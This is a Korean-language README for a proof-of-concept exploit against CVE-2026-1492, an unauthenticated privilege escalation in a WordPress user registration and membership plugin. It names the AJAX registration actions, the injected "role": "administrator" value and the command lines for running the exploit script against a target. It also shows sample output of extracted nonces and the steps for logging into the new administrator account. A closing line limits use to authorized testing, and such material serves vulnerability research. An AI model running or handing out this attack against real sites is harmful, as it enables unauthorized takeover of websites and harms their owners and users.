
# CVE-2026-1492 WordPress User Registration 플러그인 PoC 익스플로잇 WordPress User Registration 플러그인의 CVE-2026-1492에 대한 개념 증명 익스플로잇으로, 조작된 멤버십 등록을 통해 인증 없이 관리자 권한으로 권한 상승을 가능하게 합니다.
이 저장소는 WordPress User Registration & Membership 플러그인에 영향을 미치는 치명적인 취약점인 CVE-2026-1492에 대한 개념 증명 익스플로잇을 포함합니다.
이 취약점은 인증되지 않은 공격자가 멤버십 등록 프로세스를 악용하여 관리자 계정을 생성할 수 있게 합니다.
👉 이 취약점에 대한 전체 기술 분석은 여기에서 확인할 수 있습니다:
기술 분석
백엔드가 공격자가 제어하는 데이터를 단계별로 처리하는 방식과 권한 상승이 가능한 이유를 설명합니다.
이 플러그인은 멤버십 등록 프로세스 중 사용자가 제어하는 입력을 부적절하게 신뢰합니다.
구체적으로:
role을 수락합니다이를 통해 공격자는 다음을 설정할 수 있습니다:
"role": "administrator"
그리고 완전한 관리자 액세스 권한을 얻을 수 있습니다.
성공적인 악용 시 다음이 가능합니다:
이 취약점은 다단계 AJAX 프로세스를 통해 트리거됩니다:
user_registration_user_form_submit를 통해 사용자 등록user_registration_membership_register_member를 통해 멤버십 등록 트리거administrator) 주입python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] 토큰 추출 중...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] 등록 요청 전송 중...
[+] 사용자 생성됨
[*] 멤버십 요청 전송 중...
[+] 권한 상승 성공
생성된 자격 증명을 사용하여 로그인합니다:
http://target/wp-login.php
그런 다음 관리자 패널에 액세스합니다:
http://target/wp-admin/
참고: 관리자 경로는 사용자 지정될 수 있습니다.
이 익스플로잇은 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.
허가 없이 시스템에 사용하지 마십시오.